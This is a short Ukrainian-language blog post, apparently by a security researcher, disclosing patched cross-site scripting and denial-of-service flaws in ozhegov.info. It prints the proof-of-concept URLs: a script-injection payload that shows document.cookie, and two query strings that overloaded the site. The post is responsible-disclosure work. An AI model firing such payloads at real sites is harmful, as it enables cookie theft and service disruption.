Уразливості на ozhegov.info

15:08 18.11.2010

02.03.2010

У серпні, 11.08.2009, я знайшов Cross-Site Scripting та Denial of Service уразливості на проекті http://ozhegov.info. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

18.11.2010

XSS:

http://ozhegov.info/?q=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

DoS:

http://ozhegov.info/?q=*

http://ozhegov.info/?q=%

Дані уразливості вже виправлені.


Leave a Reply

You must be logged in to post a comment.